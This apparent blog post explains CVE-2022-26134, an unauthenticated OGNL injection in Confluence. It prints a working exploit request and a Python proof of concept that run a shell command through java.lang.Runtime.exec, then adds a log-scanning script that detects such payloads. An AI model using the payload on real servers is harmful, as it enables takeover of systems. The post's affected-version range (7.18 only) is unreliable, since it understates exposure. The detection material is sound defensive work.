CVE-2022-26134 is a critical security vulnerability found in Atlassian’s Confluence Server and Data Center. It allows an attacker, with no need to log in (“unauthenticated”), to run any code they like on the vulnerable server. In the wrong hands, this can lead to complete compromise of the server—hackers can steal data, install ransomware, or use the machine to attack others.

Affected versions: from 7.18 before 7.18.1

For companies still using those versions, this is not just theory – hackers have actively used this bug in the wild.

What is OGNL Injection?

*OGNL (Object-Graph Navigation Language)* is an expression language used in several Java frameworks, including Apache Struts, and in this case Confluence. An OGNL injection vulnerability means the attacker can pass OGNL code to the server and have it evaluated, which on this version of Confluence lets them run arbitrary commands on the server.

The Exploit Details (With Simple Code)

Here’s a very basic example. Imagine an attacker wants the server to run the id command (which prints the current user’s identity on Unix/Linux). They can do it with a browser or curl.

Let’s say the target is at https://vulnerable-confluence.example.com.

The attacker sends a GET request like this (real attackers would hide their tracks better):

GET /%24%7B%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29%7D/ HTTP/1.1
Host: vulnerable-confluence.example.com

Here’s what’s happening:

- /${(@java.lang.Runtime@getRuntime().exec('id'))}/ is inserted into the path of the request. The strange encoding (%24…%7D) is just that same text, URL-encoded.

- @java.lang.Runtime@getRuntime().exec('id') makes Java run the command ‘id’ in the server’s shell.

Attackers may automate this exploit. Here’s a simple proof-of-concept using Python:

import requests

# TARGET your vulnerable Confluence instance
target = "http://vulnerable-confluence.example.com/${(@java.lang.Runtime@getRuntime().exec('id'))}/"

try:
    r = requests.get(target, timeout=10)
    print("Status:", r.status_code)
    print("Server Response:", r.text)
except Exception as e:
    print("Error:", e)

Of course, real attacks would use reverse shells, download malware, etc.

How to Fix CVE-2022-26134

1. Upgrade Confluence immediately. Fixed releases (7.18.1 …) are safe from this exploit.

Get the latest patches from Atlassian’s Confluence Downloads Page.

Original Advisories and References

- Atlassian Security Advisory 2022-06-02
- MITRE CVE Record
- Rapid7 Blog: Technical Analysis of CVE-2022-26134

Key Takeaways

- CVE-2022-26134 is extremely dangerous: Exploitable by anyone, without logging in, and has been used in real attacks.
- Patch your servers now: If you use Confluence and haven’t patched, stop what you’re doing and update.
- Monitor for compromise: If your system was exposed, check for new user accounts, strange files, and outgoing network connections.
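Two things a defender wants from the request walkthrough above and from the "monitor for compromise" takeaway are a way to see what was actually sent and a way to find it in logs. The following is an added example, not code from the original post or from Atlassian. It URL-decodes the request path from web-server access log lines (the log lines are constructed for the example, not real traffic), flags any ${...} OGNL expression block in the path, and raises the severity when the block carries the @java.lang.Runtime / getRuntime / .exec( tokens the post describes. Decoding is repeated so that a double-encoded path is not missed.

```python
"""Added detection helper for CVE-2022-26134-style requests.

Not from the original post or from Atlassian. Scans access log lines in
Combined Log Format (as written by a web server or reverse proxy in front of
Confluence) for request paths carrying a URL-encoded ${...} OGNL expression.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic). Line 1 carries the exact
# encoded path shown earlier in the post; line 4 carries a double-encoded,
# harmless-looking expression probe.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Jun/2022:10:12:01 +0000] "GET /%24%7B%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.79.1"
198.51.100.7 - - [03/Jun/2022:10:12:05 +0000] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [03/Jun/2022:10:12:09 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
192.0.2.44 - - [03/Jun/2022:10:13:00 +0000] "GET /%2524%257B1%252B1%257D/ HTTP/1.1" 404 120 "-" "python-requests/2.28"
"""

# The quoted request field: "METHOD PATH PROTO".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[0-9.]+)"')
# An OGNL expression block once the path is decoded: ${ ... }
OGNL_BLOCK_RE = re.compile(r"\$\{.*?\}")
# Tokens from the post's payload that indicate command execution rather than
# a bare expression probe.
EXEC_MARKERS = ("@java.lang.Runtime", "getRuntime", ".exec(")


def fully_decode(path, max_rounds=3):
    """URL-decode repeatedly so a double-encoded payload (%2524 -> %24 -> $) is caught."""
    decoded = path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify_path(path):
    """Return None for a benign path, otherwise a dict describing the OGNL indicators."""
    decoded = fully_decode(path)
    blocks = OGNL_BLOCK_RE.findall(decoded)
    if not blocks:
        return None
    markers = [m for m in EXEC_MARKERS if any(m in b for b in blocks)]
    return {
        "decoded": decoded,
        "expressions": blocks,
        # Any ${...} in a path is worth a look; exec markers make it high.
        "severity": "high" if markers else "medium",
        "exec_markers": markers,
    }


def scan_log(text):
    """Return a list of (line_no, client_ip, finding) for every suspicious request line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = classify_path(m.group("path"))
        if finding:
            client_ip = line.split(" ", 1)[0]
            hits.append((n, client_ip, finding))
    return hits


if __name__ == "__main__":
    for n, ip, f in scan_log(SAMPLE_LOG):
        print(f"line {n} from {ip}: {f['severity']} -> {f['decoded']}")
```

Point scan_log at the access log of whatever sits in front of Confluence; the regex assumes Combined Log Format, so adjust REQUEST_RE if your proxy logs differently. A "medium" hit (an expression with no exec markers) is still worth treating as a probe of the same bug, and any hit at all on an unpatched instance is a reason to start the compromise checks listed above.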

Stay safe, patch early, and monitor your servers!

*This post is exclusive and written simply for those seeking clear, actionable information on CVE-2022-26134. Share to help others stay protected!*

Timeline

Published on: 06/03/2022 22:15:00 UTC
Last modified on: 06/30/2022 06:15:00 UTC